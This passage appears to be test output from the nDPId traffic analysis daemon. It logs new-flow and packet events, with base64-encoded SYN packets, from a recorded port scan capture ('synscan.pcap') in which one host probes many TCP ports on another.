-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1335,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1335,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1325,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsE3cAACgGDPysEAAIQA2GNIzSDNPdUoMYAAAAAGACBAAnvAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1336,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1145,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1336,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1326,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsMosAADIG4+esEAAIQA2GNIzSBHndUoMYAAAAAGACDAAoFgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1337,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1337,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1327,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsv5AAADIGVuKsEAAIQA2GNIzSCI\/dUoMYAAAAAGACDAAkAAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1338,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1338,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1328,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAszeUAADsGP42sEAAIQA2GNIzSTiDdUoMYAAAAAGACEADabgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1339,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1339,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1329,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAs+zcAADMGGjusEAAIQA2GNIzSBAvdUoMYAAAAAGACEAAkhAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1340,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1340,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1330,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAsJtYAADsG5pysEAAIQA2GNIzSAFjdUoMYAAAAAGACEAAoNwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1341,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1341,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1331,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAsbMEAADkGorGsEAAIQA2GNIzSBB\/dUoMYAAAAAGACCAAscAAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1342,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32772,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1342,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1332,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAsfVEAADAGmyGsEAAIQA2GNIzSgATdUoMYAAAAAGACBAC0igAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1343,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1343,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1333,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAsMZMAADkG3d+sEAAIQA2GNIzSBDXdUoMYAAAAAGACCAAsWgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1344,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1344,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1334,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAs3h4AADoGMFSsEAAIQA2GNIzSGabdUoMYAAAAAGACDAAS6QAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1345,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060493,"flow_last_seen":1278275060493,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060493,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1345,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1335,"flow_packet_id":1,"flow_last_seen":1278275060493,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060493,"pkt":"ACYLMQczACWzv5HuCABFAAAszXIAADkGQgCsEAAIQA2GNIzS3aHdUoMYAAAAAGACCABS7QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1346,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5961,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1336,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsaFcAACYGuhusEAAIQA2GNIzSF0ndUoMYAAAAAGACDAAVRgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1347,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":58080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1347,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1337,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsoCcAACkGf0usEAAIQA2GNIzS4uDdUoMYAAAAAGACCABNrgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1348,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9207,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1348,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1338,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsD\/IAADoG\/oCsEAAIQA2GNIzSI\/fdUoMYAAAAAGACDAAImAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1349,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1349,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1339,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsLzkAADAG6TmsEAAIQA2GNIzSBGbdUoMYAAAAAGACBAAwKQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1350,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1350,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1340,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsdksAADkGmSesEAAIQA2GNIzSS1PdUoMYAAAAAGACCADlOwAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1351,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":513,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1351,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1341,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsyvwAADAGTXasEAAIQA2GNIzSAgHdUoMYAAAAAGACBAAyjgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1352,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1352,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1342,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAs0McAACsGTKusEAAIQA2GNIzSAtLdUoMYAAAAAGACEAAlvQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1353,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49153,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1353,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1343,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsyTwAADQGSzasEAAIQA2GNIzSwAHdUoMYAAAAAGACBAB0jQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1354,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1354,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1344,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAs928AADQGHQOsEAAIQA2GNIzSH0HdUoMYAAAAAGACBAAVTgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1355,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3370,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1355,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1345,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsvbAAAC0GXcKsEAAIQA2GNIzSDSrdUoMYAAAAAGACCAAjZQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1356,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1356,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1346,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAs2wcAADYGN2usEAAIQA2GNIzSEJLdUoMYAAAAAGACDAAb\/QAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1357,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1357,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1347,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAs2yMAADIGO0+sEAAIQA2GNIzSF3ndUoMYAAAAAGACDAAVFgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1358,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1358,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1348,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsbeEAADIGqJGsEAAIQA2GNIzSDx3dUoMYAAAAAGACDAAdcgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1359,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 